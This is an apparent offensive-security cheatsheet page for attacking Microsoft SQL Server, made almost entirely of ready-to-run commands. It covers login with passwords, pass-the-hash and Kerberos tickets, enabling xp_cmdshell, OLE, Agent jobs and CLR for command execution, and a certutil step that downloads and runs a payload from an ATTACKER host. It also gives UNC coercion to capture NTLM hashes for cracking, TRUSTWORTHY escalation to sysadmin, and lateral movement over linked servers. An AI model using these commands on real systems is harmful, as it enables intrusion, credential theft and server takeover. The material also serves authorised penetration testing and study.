Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 05. SQL / MSSQL

Cheatsheet

Use this as a quick reference for MSSQL enumeration, exploitation, privilege escalation, and lateral movement.


Connect

mssqlclient.py user:Passw0rd!@10.10.10.5 -port 1433
mssqlclient.py LAB/user:Passw0rd!@10.10.10.5 -windows-auth
mssqlclient.py LAB/user@10.10.10.5 -windows-auth -hashes :8846F7EAEE8FB117AD06BDD830B7586C
KRB5CCNAME=/tmp/cc mssqlclient.py LAB/user@10.10.10.5 -k -no-pass
sqlcmd -S tcp:10.10.10.5,1433 -U user -P pass
sqlcmd -S 10.10.10.5 -E
sqlcmd -S 10.10.10.5 -U user -P pass -N -C

Identity

SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT SYSTEM_USER, SUSER_SNAME() AS login, CURRENT_USER AS db_user;
SELECT ORIGINAL_LOGIN() AS original_login, HOST_NAME() AS host_name;
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
SELECT net_transport, encrypt_option, auth_scheme FROM sys.dm_exec_connections WHERE session_id = @@SPID;

Server And Config

SELECT @@VERSION;
SELECT @@SERVERNAME;
SELECT SERVERPROPERTY('InstanceName'), SERVERPROPERTY('MachineName'), SERVERPROPERTY('IsClustered');

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('Ad Hoc Distributed Queries','xp_cmdshell','Ole Automation Procedures','clr enabled','clr strict security','external scripts enabled','cross db ownership chaining','remote access')
ORDER BY name;

Databases And Data

SELECT name, state_desc, recovery_model_desc FROM sys.databases ORDER BY name;
USE DB;
SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name='TABLE';
SELECT TOP 10 * FROM dbo.users;

Non-empty tables:

SELECT s.name AS SchemaName, t.name AS TableName, SUM(p.rows) AS Rows
FROM sys.tables t
JOIN sys.schemas s ON t.schema_id = s.schema_id
JOIN sys.partitions p ON t.object_id = p.object_id
WHERE p.index_id IN (0, 1)
GROUP BY s.name, t.name
ORDER BY Rows DESC;

Roles And Impersonation

EXEC sp_helpsrvrolemember;

SELECT r.name AS role, m.name AS member
FROM sys.server_principals r
JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id
JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id
WHERE r.name='sysadmin';

SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id=b.principal_id
WHERE a.permission_name='IMPERSONATE';

EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
REVERT;

xp_cmdshell

SELECT name,value_in_use FROM sys.configurations WHERE name='xp_cmdshell';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig /all';

Stage payload:

EXEC xp_cmdshell 'certutil -urlcache -split -f http://ATTACKER/p.exe C:\Windows\Temp\p.exe';
EXEC xp_cmdshell 'C:\Windows\Temp\p.exe';

OLE Automation

SELECT name,value_in_use FROM sys.configurations WHERE name='Ole Automation Procedures';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

DECLARE @sh INT, @ret INT;
EXEC sp_OACreate 'WScript.Shell', @sh OUT;
EXEC sp_OAMethod @sh, 'Run', @ret OUT, 'cmd.exe /c whoami > C:\ole.txt', 0, TRUE;

SQL Agent Job RCE

EXEC msdb.dbo.sp_add_job @job_name='poc_job';
EXEC msdb.dbo.sp_add_jobstep @job_name='poc_job', @step_name='poc', @subsystem='CMDEXEC', @command='cmd /c whoami > C:\agent.txt';
EXEC msdb.dbo.sp_add_jobserver @job_name='poc_job';
EXEC msdb.dbo.sp_start_job @job_name='poc_job';
EXEC msdb.dbo.sp_delete_job @job_name='poc_job';

CLR And External Scripts

SELECT name,value_in_use FROM sys.configurations WHERE name='clr enabled';
CREATE ASSEMBLY myexec FROM 'C:\CLRExec.dll' WITH PERMISSION_SET=UNSAFE;
CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME myexec.[CLRExec].RunCmd;
EXEC sp_cmd 'whoami';
DROP PROCEDURE IF EXISTS dbo.sp_cmd;
DROP ASSEMBLY IF EXISTS myexec;
SELECT name,value_in_use FROM sys.configurations WHERE name='external scripts enabled';
EXEC sp_execute_external_script @language=N'Python', @script=N'import os;print(os.popen("whoami").read())';

File, Registry, UNC Coercion

EXEC xp_dirtree 'C:\', 1, 1;
EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts';
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion','ProductName';
EXEC xp_logininfo 'BUILTIN\\Administrators','members';

Responder:

sudo responder -I tun0 -v

Coerce:

EXEC xp_dirtree '\\ATTACKER\\share\\ping';
EXEC xp_subdirs '\\ATTACKER\\share\\ping';
EXEC xp_fileexist '\\ATTACKER\\share\\ping';

Crack:

hashcat -m 5600 hashes.txt rockyou.txt

TRUSTWORTHY Escalation

SELECT a.name AS database_name, b.name AS owner, is_trustworthy_on
FROM sys.databases a
JOIN sys.server_principals b ON a.owner_sid=b.sid;
USE DB_GOES_HERE;
GO
CREATE PROCEDURE dbo.make_sysadmin
WITH EXECUTE AS OWNER
AS
BEGIN
    EXEC master..sp_addsrvrolemember 'CONTROLLED_USER', 'sysadmin';
END;
GO
EXEC dbo.make_sysadmin;
GO

Verify:

SELECT IS_SRVROLEMEMBER('sysadmin');

Linked Servers

EXEC sp_linkedservers;
SELECT name, product, provider, data_source, is_rpc_out_enabled FROM sys.servers;
EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKNAME];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKNAME];

Enable remote xp_cmdshell:

EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami'';') AT [LINKNAME];

Cleanup

EXEC msdb.dbo.sp_delete_job @job_name='poc_job';
DROP PROCEDURE IF EXISTS dbo.sp_cmd;
DROP ASSEMBLY IF EXISTS myexec;
DROP PROCEDURE IF EXISTS dbo.make_sysadmin;
REVERT;